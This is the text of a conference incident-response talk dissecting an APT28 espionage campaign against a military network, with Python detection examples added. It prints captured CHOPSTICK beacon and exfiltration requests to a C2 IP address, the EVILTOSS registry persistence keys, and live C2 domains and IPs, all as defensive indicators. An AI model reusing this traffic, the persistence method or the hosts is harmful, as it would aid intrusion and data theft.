SESSION ID: CTT-W08
Evolving Threats: Dissection of a Cyber-Espionage Attack
Stefano Maccaglia
Advisory Consultant IR
RSA (a Division of EMC)
#RSAC
Who I Am
I prefer not to talk too much about myself…
Let's just say I am an Advisory Consultant at RSA IR.
I am an Incident Responder with deep knowledge of malware and network analysis.
I started my career in 1997.
I have worked for several top 100 companies.
Before that I was a cracker in the European «underground scene» of Amiga and PCs.
Agenda
What we discuss today
Today I will introduce a case I am still working on.
The case is related to the Military Sector, and it has been recorded, with minimal differences, in several EU military environments.
The details of the attack are under strict NDA, but with slight modifications I have the chance to share the most important details about the attacker's strategies, tactics and tools.
The case is interesting for several reasons that we will discuss today.
The triage is still going on.
The adversary
APT28
The attack has been attributed to APT Group 28, also known as “Sofacy” or “Sednit”. I will call it “APT28” from now on.
APT28 is believed to have been in operation since 2007 and has been identified in several attacks that targeted Eastern European governments, military and security-related organizations, including the North Atlantic Treaty Organization (NATO).
The group uses a complex set of tools and strategies to gain a foothold in an environment and to control and steal interesting data.
Several sources consider APT28 a group of cyber-mercenaries based in Russia.
The target: the moat without water
How to develop a good network segmentation and be breached
The attack targeted a military environment in the EMEA region.
The environment was born segmented, with several layers of controls to preserve the confidentiality and integrity of exchanged and stored data.
The segmentation separates the network into several layers with different levels of “trust”.
Every operator receives a badge and a smartcard to operate in the network.
Communication from a lower to a higher layer of trust is blocked, while communication from a higher layer to a lower one is permitted.
At the beginning of the investigation I discovered that the base lacked any real network visibility. The only network devices capable of analyzing streams were sporadic IDS and IPS placed in non-strategic points.
The target: the moat without water
How to develop a good network segmentation and be breached
The environment is a Microsoft AD Forest with a pyramidal structure.
• The root AD trusts several subdomains, each with its own set of AD servers.
• The forest is regulated with different levels of trust.
• The «Secret» and «NATO» networks are physically separated entities where people can access only through dedicated machines.
• Under no circumstances can a user from the standard AD structure access the Secret networks.
The target: the moat without water
How to develop a good network segmentation and be breached
Patching policies are 15 days behind Microsoft releases.
All other applications are patched and upgraded based on internal CERT approval.
The reason for the delay is the need to verify the consistency and the impact of each upgrade/patch against the production environment.
During the investigation we discovered that, in the Data Center, two AD servers related to trusted subdomains had not been properly patched since November 2014, due to the swap from one maintenance contractor to another.
The missing patch MS14-068 is key to understanding how deeply and how hard they have been breached.
The Attack
The attack strategy
How they break in
The attack started from a targeted spear-phishing campaign against the participants of the 2014 Farnborough Air Show.
The attack targeted 7 officials of the Air Force (AM) and 2 officials of the Navy (MM); the source email domain was “militaryexponews[.]com”.
The attack exploited a Microsoft Word vulnerability (CVE-2015-2424).
Only in two cases did the attack complete successfully for the attacker.
In seven cases the exploit, despite detonating successfully, was not able to start the infection because the machines lacked direct Internet access (the proxy blocked the connection attempts).
The reconstruction of the first stage was performed after the creation of a proper set of IOCs, starting from the infected systems.
The Attack
Dissemination strategy
Diagram (flow, in order):
• Spear-phishing vector + first dropper (CORESHELL dropper)
• First C&C HTTP POST message; streams to external C2 or dropzone
• Second-stage backdoor download (EVILTOSS)
• EVILTOSS execution: the malware beacons to the C&C and sends stolen data
• Lateral movements and exfil
• EVILTOSS can download the CHOPSTICK trojan from the C&C
• CHOPSTICK allows the attacker to extend the control of the target
• Complete control over the target system
Attack Overview: End of First Wave
The infected hosts, while roaming at external sites, communicate with the C2.
Diagram: Attacker and Main C2 (microsofthelpcenter.info); Victim 1 and Victim 2 reach the C2 when roaming; from inside the Base their attempts to access the C2 are blocked by the proxy.
Note: The repeated attempts to communicate externally from infected machines, blocked by the proxy, were considered «of no interest» by the SOC of the base. No other investigation or action was taken, at the time, against these machines.
The attack strategy
More patients to care about…
To escalate the infection, the attacker used the OWA access of the stolen accounts to enumerate other potential victims for a new wave of targeted emails.
Also, one of the officers has access to the internal SharePoint service and participates in boards where specific internal meetings and projects are discussed.
With tailored messages published on the SharePoint board, the attacker was able to sneak through the inner layers of the military infrastructure, distributing the dropper.
One lesson I learned from SharePoint…
it has a horrible log format.
Attack Overview: End of Second Wave
Diagram: Attacker and C2s (microsofthelpcenter.info, 1oo7.net, 176.31.112.10) on the public WAN; Victim 1, Victim 2 and the Base hosts are «still under control», with locations including Washington, Moscow, Kiev, Skopje and Addis Ababa.
The attack strategy
The infection evolution
In this second wave of attack the adversary, knowing that the previous phase had not succeeded as planned due to the access restrictions of proxy and firewalls, modified the dropper in order to work through the internal proxy (with HTTP and SSL).
The modification ensured control of all successfully infected hosts.
IOC: Proxy. Test performed after collection of the dropper from the original spear-phishing email.
The attack strategy
The infection progression
The attacker now has a significant set of standard Domain User accounts.
Not enough to pwn the infrastructure, but good enough as a starting point.
Thanks to his backdoor, he can easily begin to extend his action to other systems.
Lacking logs and network visibility for that part, we can only speculate that he successfully identified the vulnerable Navy subdomains by accessing Navy computers in the base.
The victims have direct access to the above-mentioned AD servers because they use them for standard authentication.
APT28 at this point has breached the AD servers, collected domain admin credentials and moved forward to the Root AD and the repositories where the “interesting data” resides.
CVE-2014-6324
LOG IOC
Windows Audit log showing the successful exploitation of the Kerberos service.
• When looking at the Audit log, to recognize the successful exploit we should compare the Security ID with the Account Name. The two should belong to the same account.
• In this case, slightly modified from the original log, we can see «Officer A» logging in with the Security ID of «Administrator».
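As an added example (not part of the original slides), the comparison described above can be automated: the Python below parses the text of Windows Security event 4624 records, takes the Security ID and Account Name from the New Logon section, and compares the SID with the one a directory export holds for that account. A mismatch is the MS14-068 / CVE-2014-6324 signature the slide describes: a low-privilege user logging on under a privileged SID. The sample events, the NAVY domain, the account names, the SIDs and the directory export are all constructed for this example.

```python
import re
from typing import Dict, List

# Constructed sample: two Windows Security events (ID 4624, "An account was
# successfully logged on") in the text layout Event Viewer shows. The domain,
# account names and SIDs are invented; only the field names are real.
SAMPLE_4624_EVENTS = """\
An account was successfully logged on.
New Logon:
    Security ID:        S-1-5-21-1111111111-2222222222-3333333333-1104
    Account Name:       officer.a
    Account Domain:     NAVY
    Logon ID:           0x3E7A1
Logon Type:             3
Authentication Package: Kerberos
----
An account was successfully logged on.
New Logon:
    Security ID:        S-1-5-21-1111111111-2222222222-3333333333-500
    Account Name:       officer.a
    Account Domain:     NAVY
    Logon ID:           0x4F002
Logon Type:             3
Authentication Package: Kerberos
"""

# Constructed directory export: principal -> SID, as a domain controller resolves them.
DIRECTORY_SIDS: Dict[str, str] = {
    "NAVY\\officer.a": "S-1-5-21-1111111111-2222222222-3333333333-1104",
    "NAVY\\Administrator": "S-1-5-21-1111111111-2222222222-3333333333-500",
}

EVENT_SEPARATOR = "----"
FIELD_PATTERNS = {
    "sid": re.compile(r"Security ID:\s*(\S+)"),
    "account": re.compile(r"Account Name:\s*(\S+)"),
    "domain": re.compile(r"Account Domain:\s*(\S+)"),
}
AUTH_PACKAGE = re.compile(r"Authentication Package:\s*(\S+)")


def parse_logon_events(text: str) -> List[Dict[str, str]]:
    """Pull the 'New Logon' identity fields out of each 4624 event block."""
    events = []
    for block in text.split(EVENT_SEPARATOR):
        if "New Logon:" not in block:
            continue
        new_logon = block.split("New Logon:", 1)[1]  # skip the Subject section
        fields = {}
        for key, pattern in FIELD_PATTERNS.items():
            match = pattern.search(new_logon)
            if match is None:
                break
            fields[key] = match.group(1)
        else:
            pkg = AUTH_PACKAGE.search(block)
            fields["auth_package"] = pkg.group(1) if pkg else "unknown"
            events.append(fields)
    return events


def find_sid_mismatches(events: List[Dict[str, str]],
                        directory: Dict[str, str]) -> List[Dict[str, str]]:
    """Flag logons whose Security ID is not the SID the directory holds for the
    named account. With MS14-068 the forged PAC makes a normal user log on
    under a privileged SID, which is exactly this mismatch."""
    expected = {name.upper(): sid for name, sid in directory.items()}
    owner_of = {sid: name for name, sid in directory.items()}
    findings = []
    for ev in events:
        principal = f"{ev['domain']}\\{ev['account']}"
        expected_sid = expected.get(principal.upper())
        if expected_sid is None or expected_sid == ev["sid"]:
            continue
        findings.append({
            "account": principal,
            "logged_sid": ev["sid"],
            "expected_sid": expected_sid,
            "sid_owner": owner_of.get(ev["sid"], "unknown principal"),
            "auth_package": ev["auth_package"],
        })
    return findings


if __name__ == "__main__":
    for f in find_sid_mismatches(parse_logon_events(SAMPLE_4624_EVENTS), DIRECTORY_SIDS):
        print(f"{f['account']} logged on with the SID of {f['sid_owner']} via {f['auth_package']}")
```

The directory export is the part that makes the check work offline: without a trusted name-to-SID mapping captured before the incident, a reviewer can only eyeball the RID suffix (500 is the built-in Administrator) and would miss forged memberships of other privileged groups.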
Pwning the core: CVE-2015-1701
AKA… «How to pwn your AD and live undetected»…
The attacker was able to exploit the root AD servers thanks to an (initially) unknown local privilege escalation vulnerability, CVE-2015-1701.
The attacker exploited a callback in user space. Upon completion, the payload continues execution in user mode with the privileges of the System process.
Note: The technique has been reported by Microsoft thanks to the analyses carried out in this engagement…
The Incident
Patient Zero
How the victim discovered the problem
The diplomatic representation in Addis Ababa is composed of a few military personnel and several diplomats, connected to the Internet with the standard VPN service from public networks (transiting through the Base). For that part, nobody noticed the strange connections to the external C2s, repeated each day.
But for a specific task, the owner of the infected laptop used a connection from a military outpost, tightly regulated in access time and permissions.
Once connected, the computer attempted to beacon to the C2s, and the local network operator identified the strange traffic, signaling it to his superiors.
The alert escalated to the Army regiment, which started to investigate.
The analysis performed followed the traditional practice.
Patient Zero
What's on the Customer's “Patient Zero” machine?
The forensic analysis on the «Patient Zero» identified by the Customer showed the following suspicious files and registry modifications, but no attempt to expand the focus of the investigation was made.
Registry keys and values (Created / Modified):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDll = C:\Windows\System32\netids.dll (Created: Yes / Modified: No)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDllUnloadOnStop = 1 (Created: Yes / Modified: No)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\ntsvcs = Network Identification Service (Created: Yes / Modified: No)
HKEY_LOCAL_MACHINE\software\microsoft\windowsNT\currentversion\svchost\ntsvcs\CoInitializeSecurityParam = 1 (Created: Yes / Modified: No)
EVILTOSS backdoor
Patient Zero consequences
How the attacker reacted
The Army triaged the compromised system by reinstalling the OS and applications, and closed the case.
As a result of the triage, the attacker changed strategy for a while.
APT28 lowered the volume of its traffic and, for more than 20 days, nothing was reported.
The military was ready to close the case, but another anomaly was found during scheduled maintenance on a server in the base Data Center.
Looking at the logs, they discovered repeated accesses from an Administrator account logging in from an external IP address.
The case escalated quickly this time.
The Methodology
What can we bring to the table?
I am part of the RSA IR Team, and our structured approach, developed from our field experience, is now tuned to face attacks like this one.
Our approach leverages “Actionable IoCs” and the support of tools that can easily integrate these IoCs to speed up the IR investigation process.
This is a methodology and not a “method”, because it counts on procedures, analyses and evidence in a scientifically sound approach.
To collect actionable IoCs we use a synergic approach that combines network and system visibility with log and malware analysis.
It involves the aggregation of IoCs and their classification to create a “Knowledge Base” of attacks, tools and strategies that can be “reused” in subsequent engagements to streamline the response and support attribution.
The Methodology
Diagram: Network visibility, Malware visibility and System visibility define the incident surface; from them come network, system and log indicators; these feed classification and attribution; the triage is planned from a tailored set of strategic actions.
Actionable IoCs
What our methodology suggests
IR is an ongoing process that spans multiple areas.
Actionable IoCs
What our methodology suggests
To operationalize an IoC you should develop, use and store it in a reusable logic.
Investigation: first step
The Customer initially escalated the problem to another team, but despite the efforts and a triage attempt, the result was not satisfactory.
A few days after the triage they discovered additional lateral movements in their network.
At this point the Customer called us.
We noticed, from the initial talk, that the Customer lacked any network visibility and that the investigation had been performed without a structured approach.
• No network visibility
• No detailed analysis was performed initially
• Limited quantity of historical logs
• The initial investigation was limited to MD5 searches on Domain machines
Zero Trust
Below zero trust…
Following our advice to bring a network forensic tool into their environment (RSA Security Analytics), we were able to establish that, even after the «apparent» expulsion of the attacker, several machines were still infected.
Successful communication was recorded after the expulsion/triage…
The «network visibility» also offered the chance to proactively monitor the occurrence of other malicious attacks.
Our investigation
Our approach tailored to the case
• We rebuilt the investigation process from scratch, aiming to identify malicious behavior from the already collected samples, to build optimal Network Forensic IOCs and to apply them as a base to highlight further infected machines.
• Integrated a Network Forensic Tool: RSA SA.
• Redefined Actionable IOCs at Network, System and Log level for different platforms and systems.
• Refocused the malware analysis on all identified samples to identify Actionable IOCs.
• Improved the triage strategy by moving from «seek & destroy» to a more strategic approach.
• Thanks to that we were able to enumerate the remaining infected machines and to unearth the “missing piece”: the Chopstick RAT, which the original IR team was not able to identify. We know, from experience, that APT28 uses the Chopstick RAT for the most interesting targets.
Attacker Tools
APT 28 Tools
APT 28 Tools seen in this investigation
CORESHELL: This downloader is the evolution of APT28's previous downloader of choice, known as “SOURFACE” (or “Sofacy”). Once executed, it creates the conditions to download and execute a second stage (usually EVILTOSS) from a C2.
EVILTOSS: This backdoor is delivered through the CORESHELL downloader to gain system access for reconnaissance, monitoring, credential theft and shellcode execution.
CHOPSTICK: This is a modular implant compiled from a software framework that provides tailored functionality and flexibility. By far, Chopstick is the most advanced tool used by APT 28.
MIMIKATZ: Every one of us knows this tool. In this case it had devastating effects, completely compromising the AD Forest.
APT 28 Tools
CORESHELL behavioral analysis
Coreshell was relatively easy to detonate, apart from some anti-VM checks before executing.
The behavioral analysis highlighted several DNS connections: the DNS requests are aimed at different external hosts.
The malware uses a beacon mechanism based on HTTP POST and a separate thread for instructions, still over HTTP.
The User-Agent, as explained earlier, can be used as an IOC, at least for the oldest variants.
Note: The latest version of CORESHELL uses the victim's browser User-Agent, making the IOC useless.
APT 28 Tools
CORESHELL ATTRIBUTION BY COMPARISON
The attribution was performed in two ways:
• by comparison, between the discovered samples and the public ones;
• by analysis, looking for indicators related to the date and time of compilation, the time zone, the language of the malware and its behaviour.
The dropped files were verified as well and compared between different droppers.
APT 28 Tools
EVILTOSS IOCs
At system level the malware modifies the Registry in order to ensure persistence.
It is usually dropped and executed from one of these folders (EVILTOSS installation folder):
• %system%
• %temp%
• %commonprogramfiles%\System\
Registry keys and values (Created / Modified):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDll = %EVILTOSS folder%.dll (Created: Yes / Modified: No)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDllUnloadOnStop = 1 (Created: Yes / Modified: No)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\ntsvcs = Network Identification Service (Created: Yes / Modified: No)
HKEY_LOCAL_MACHINE\software\microsoft\windowsNT\currentversion\svchost\ntsvcs\CoInitializeSecurityParam = 1 (Created: Yes / Modified: No)
EVILTOSS capabilities:
• download files from a remote computer and/or the Internet
• run executable files
• log keystrokes
• send gathered information
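As an added example (not from the original deck or from RSA), here is a host-side check that serves both this slide and the Patient Zero table: it parses the text produced by `reg query <key> /s` and looks for the EVILTOSS persistence traits listed above, namely the “Network Identification Service” service name, a ServiceDll called netids.dll, a ServiceDll loaded from %temp% or %commonprogramfiles%\System, and that service being added to a svchost group. The sample export, the benign Dnscache entry and the layout are constructed; the service name, DLL name and drop folders are the ones on the slides.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the layout printed by `reg query <key> /s`, containing the
# EVILTOSS persistence entries from the slides plus a benign Dnscache service for
# contrast. Only the EVILTOSS values (service name, netids.dll) come from the deck.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Dnscache\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\dnsrslvr.dll
    ServiceDllUnloadOnStop    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\Windows\System32\netids.dll
    ServiceDllUnloadOnStop    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
    netsvcs    REG_MULTI_SZ    AppMgmt\0Browser\0Schedule
    ntsvcs    REG_MULTI_SZ    Network Identification Service
"""

# Indicators from the slides.
IOC_SERVICE_NAME = "network identification service"
IOC_DLL_NAME = "netids.dll"
# %temp% and %commonprogramfiles%\System, two of the drop folders listed above;
# %system% is left out because legitimate service DLLs live there as well.
SUSPICIOUS_DIR_FRAGMENTS = ("\\temp\\", "\\common files\\system\\")

KEY_LINE = re.compile(r"^HKEY_[A-Z_]+\\")
SERVICE_PARAMS_KEY = re.compile(r"\\services\\([^\\]+)\\Parameters$", re.IGNORECASE)
SVCHOST_KEY = re.compile(r"\\Windows NT\\CurrentVersion\\Svchost$", re.IGNORECASE)

RegDump = Dict[str, Dict[str, Tuple[str, str]]]  # key -> value name -> (type, data)


def parse_reg_query(text: str) -> RegDump:
    """Parse `reg query /s` output: key paths at column 0, values indented and
    separated from their type and data by runs of spaces."""
    keys: RegDump = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if KEY_LINE.match(raw):
            current = raw.strip()
            keys[current] = {}
        elif current is not None and raw.startswith(" "):
            parts = re.split(r"\s{2,}", raw.strip(), maxsplit=2)
            if len(parts) == 3:
                name, vtype, data = parts
                keys[current][name] = (vtype, data)
    return keys


def find_eviltoss_persistence(keys: RegDump) -> List[Tuple[str, str]]:
    """Return (service, reason) pairs for entries matching the EVILTOSS IOCs."""
    findings: List[Tuple[str, str]] = []
    for key, values in keys.items():
        svc_match = SERVICE_PARAMS_KEY.search(key)
        if svc_match:
            service = svc_match.group(1)
            dll = values.get("ServiceDll", ("", ""))[1]
            dll_lower = dll.lower()
            if service.lower() == IOC_SERVICE_NAME:
                findings.append((service, "service name matches EVILTOSS IOC"))
            if dll_lower.endswith("\\" + IOC_DLL_NAME):
                findings.append((service, f"ServiceDll {dll} matches EVILTOSS IOC"))
            if any(frag in dll_lower for frag in SUSPICIOUS_DIR_FRAGMENTS):
                findings.append((service, f"ServiceDll {dll} loaded from a drop folder"))
        elif SVCHOST_KEY.search(key):
            # reg query prints REG_MULTI_SZ members separated by the literal text "\0".
            for group, (_, data) in values.items():
                for member in data.split("\\0"):
                    if member.strip().lower() == IOC_SERVICE_NAME:
                        findings.append((member.strip(), f"added to svchost group '{group}'"))
    return findings


if __name__ == "__main__":
    for service, reason in find_eviltoss_persistence(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"[!] {service}: {reason}")
```

Collecting the two hives (services and Svchost) with `reg query /s` from every domain machine and running this offline is the cheap version of the “System visibility” the methodology asks for; the svchost-group check matters because the DLL name and path are trivially changed, while the service still has to be registered with a svchost group to be loaded.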
APT 28 Tools
EVILTOSS ATTRIBUTION BY COMPARISON
The attribution was performed in two ways:
• by comparison, between the discovered samples and the public ones;
• by analysis, looking for indicators related to the date and time of compilation, the time zone and the language of the malware discovered.
Lateral movements were also verified in terms of the timeframe of the logs and the hosts involved.
APT 28 Tools
EVILTOSS IOCs
EVILTOSS and CORESHELL share a lot of commonalities, both in the communication mechanism and in the obfuscation/encryption; for example, both obfuscate strings that are decoded at runtime.
EVILTOSS uses RSA encryption to encrypt data and sends it through an HTTP POST message very similar to CORESHELL traffic.
(Screenshots: the POST message, continued; the C2 ack for exfil.)
APT 28 Tools
CHOPSTICK
CHOPSTICK is a Trojan family, written in C++ and built from a framework.
It offers a diverse set of capabilities for different deployments.
It collects detailed information from the host settings and is aware of the presence of several security products.
It may communicate with external servers using SMTP, HTTP or HTTPS.
CHOPSTICK stores all collected information in a hidden file for temporary storage.
It communicates with the C2 via Windows “mailslots”, not named pipes or sockets.
The CHOPSTICK main executable creates a “mailslot” on Windows machines and acts as the mailslot server, while the code it injects into other processes acts as a client, allowing the Trojan to access and steal any type of information.
The RC4 encryption used here also uses a 50-byte static key plus a four-byte random salt value.
APT 28 Tools
CHOPSTICK IOCs
Looking at the network traffic we discovered that, after approximately 60 seconds of execution time, CHOPSTICK begins communicating with one of its C2 servers.
Usually, as in our sample, the traffic was over HTTP:
GET /find/?itwm=90QDFR9CWZckwkTPHr2GOUXPXI91A&from=yVVgOqV1UG&utm=HTXh&utm=9kV7L3Z&oprnd=Xjp1kKrDgAeFu&from=06&9u2J=nYruvlhMtXN5 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 198.105.125.74
After sending an initial HTTP GET request, it uploads the file contents of edg6EF885E2.tmp to the C2 server using HTTP POST requests:
POST /open/?ags=bBz&ags=qVs5d0kGHtil&oprnd=6ZCuc7XQ&channel=gBDFmj_fJdNk9&itwm=HJxam7mDOyIBftJ6OwEQjGBzyjpQv HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 198.105.125.74
Content-Length: 69
Connection: Keep-Alive
Cache-Control: no-cache

EMo1MTmWmHwJAwHlezPSG5-SGWRYwQm6MbGxkYhvCv7-FRCezztd2UxRArSxP285WXg==
The attack strategy
IOC: C2 list
Thanks to our structured approach we were able to identify the C2s used by the attacker and, with them, to enumerate infected hosts based on network communications.
URL                        IP              Type
microsofthelpcenter.info   87.236.215.13   HTTP/HTTPS Main C2
driversupdate.info         46.19.138.66    HTTPS C2
1oo7.net                   5.199.171.58    HTTPS C2
66.172.12.133              66.172.12.133   Coreshell C2
45.64.105.23               45.64.105.23    Coreshell C2
176.31.112.10              176.31.112.10   HTTPS C2
176.31.96.178              176.31.96.178   HTTPS C2
Note: The attacker used different infrastructures for managing infected hosts.
Note: Some of the discovered C2s are in common with other attacks recorded against other military environments in EMEA.
The C2 list confirmed the attribution and paved the way for a more structured approach to Triage.
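Added example (not part of the original deck) tying together the CHOPSTICK capture above and this C2 list: a pass over proxy logs that enumerates internal hosts which either contacted a listed C2 (by domain or IP) or showed the beacon shape of the capture (a /find/ or /open/ path, the itwm/oprnd/from/utm/ags/channel parameter names, a bare-IP Host and the old IE6 User-Agent). The log format, the internal client addresses and the 203.0.113.7 C2 are constructed; the C2 indicators and the User-Agent string are the ones on the slides. The User-Agent is scored only as a supporting signal because, as the CORESHELL slide notes, newer variants copy the victim's browser User-Agent.

```python
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# C2 indicators taken from the C2 list on the slide (domain or IP -> type).
C2_INDICATORS: Dict[str, str] = {
    "microsofthelpcenter.info": "Main C2 (HTTP/HTTPS)",
    "87.236.215.13": "Main C2 (HTTP/HTTPS)",
    "driversupdate.info": "HTTPS C2",
    "46.19.138.66": "HTTPS C2",
    "1oo7.net": "HTTPS C2",
    "5.199.171.58": "HTTPS C2",
    "66.172.12.133": "Coreshell C2",
    "45.64.105.23": "Coreshell C2",
    "176.31.112.10": "HTTPS C2",
    "176.31.96.178": "HTTPS C2",
}

# Shape of the CHOPSTICK beacon shown in the capture: /find/ and /open/ paths, a fixed
# set of query parameter names, a bare-IP Host and an IE6-era User-Agent.
CHOPSTICK_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; "
                ".NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)")
CHOPSTICK_PATHS = {"/find/", "/open/"}
CHOPSTICK_PARAMS = {"itwm", "oprnd", "from", "utm", "ags", "channel"}
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed proxy log format: timestamp client method url status "user-agent".
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

# Constructed sample log; the 10.20.30.x clients and the 203.0.113.7 server (TEST-NET-3)
# are invented and are not indicators from the investigation.
SAMPLE_PROXY_LOG = f"""\
2015-03-12T08:41:03Z 10.20.30.41 GET http://microsofthelpcenter.info/check/?id=1 200 "{BROWSER_UA}"
2015-03-12T08:41:09Z 10.20.30.41 CONNECT 1oo7.net:443 200 "{BROWSER_UA}"
2015-03-12T08:42:15Z 10.20.30.77 GET http://203.0.113.7/find/?itwm=abc&from=def&utm=ghi&oprnd=jkl 200 "{CHOPSTICK_UA}"
2015-03-12T08:42:16Z 10.20.30.77 POST http://203.0.113.7/open/?ags=x&oprnd=y&channel=z&itwm=w 200 "{CHOPSTICK_UA}"
2015-03-12T08:43:00Z 10.20.30.90 GET http://www.example.com/index.html 200 "{BROWSER_UA}"
2015-03-12T08:43:30Z 10.20.30.90 GET http://www.example.com/find/?q=1 200 "{CHOPSTICK_UA}"
"""


def host_of(method: str, url: str) -> str:
    """Destination host of a request; CONNECT lines carry host:port, not a URL."""
    if method == "CONNECT":
        return url.rsplit(":", 1)[0].lower()
    return (urlsplit(url).hostname or "").lower()


def chopstick_beacon_score(method: str, url: str, ua: str) -> int:
    """Count how many CHOPSTICK beacon traits a plain-HTTP request shows (0-4)."""
    if method == "CONNECT":
        return 0  # TLS tunnel: no path, query or UA visible to the proxy
    parts = urlsplit(url)
    score = 0
    if parts.path in CHOPSTICK_PATHS:
        score += 1
    if len(set(parse_qs(parts.query)) & CHOPSTICK_PARAMS) >= 2:
        score += 1
    if BARE_IP.match(parts.hostname or ""):
        score += 1
    if ua == CHOPSTICK_UA:  # supporting signal only; newer variants spoof the browser UA
        score += 1
    return score


def enumerate_infected_hosts(log_text: str, min_beacon_score: int = 3) -> Dict[str, List[str]]:
    """Map each internal client to the reasons it is considered infected."""
    hits: Dict[str, set] = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count and report these
        client, method, url, ua = m["client"], m["method"], m["url"], m["ua"]
        host = host_of(method, url)
        if host in C2_INDICATORS:
            hits[client].add(f"contacted {host} [{C2_INDICATORS[host]}]")
        score = chopstick_beacon_score(method, url, ua)
        if score >= min_beacon_score:
            hits[client].add(f"CHOPSTICK-like beacon to {host} (score {score}/4)")
    return {client: sorted(reasons) for client, reasons in hits.items()}


if __name__ == "__main__":
    for client, reasons in enumerate_infected_hosts(SAMPLE_PROXY_LOG).items():
        print(client)
        for reason in reasons:
            print("   ", reason)
```

The threshold of three traits out of four is what keeps the behavioural rule from firing on a legitimate site that happens to serve a /find/ path to an old browser (the last sample line scores 2 and is ignored), while the C2 list still catches hosts that only tunnel to a listed domain over CONNECT, where the beacon shape is invisible to the proxy.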
Incident Timeline and Stats
Results of our methodology vs. previous results obtained by the Customer
Chart: peak of attack distribution, y-axis 0 to 300, x-axis Oct-14 to Sep-15, two series (APT28, Remediation). Milestones marked on the timeline: Initial Spearphishing, First Phase of Attack, Patient Zero, Initial massive triage, First time our methodology was applied, Last record of infected machine, Final triage managed by our Team, Remediation.
Conclusion
What I can suggest
It is extremely valuable to build an internal Knowledge Base about incidents and attacks recorded and published, and to extract IOCs from these incidents.
It is extremely useful to refocus the IR procedures by dividing them into four areas:
• Network Forensics
• System Forensics
• Log Analysis
• Malware Analysis
Outcomes shown alongside: Actionable IOCs, Rapid Incident reaction, Proactive Management.
It can be extremely important to streamline the IR procedures by transforming IOCs into actionable IOCs, which means evaluating and defining which IOCs can be reused and which ones are limited to a specific attack or event.
It is important to drill and to give IR personnel the chance to learn how to build, use, extract, evaluate and properly store Actionable IOCs.
Conclusion
What our methodology suggests
• You should not approach IR operations in an unstructured way.
• You should ensure proper «visibility» in all IR fields.
• You should avoid managing the Incident through «work-arounds» and «shortcuts».
• You should avoid relying only on technologies.
• You should keep your IR capabilities updated.
• Once formalized, you should use IoCs as a key element to evaluate the attack surface.
• You should organize the triage in a strategic approach.
EMC, RSA, the EMC logo and the RSA logo are trademarks of EMC Corporation in the U.S. and other countries.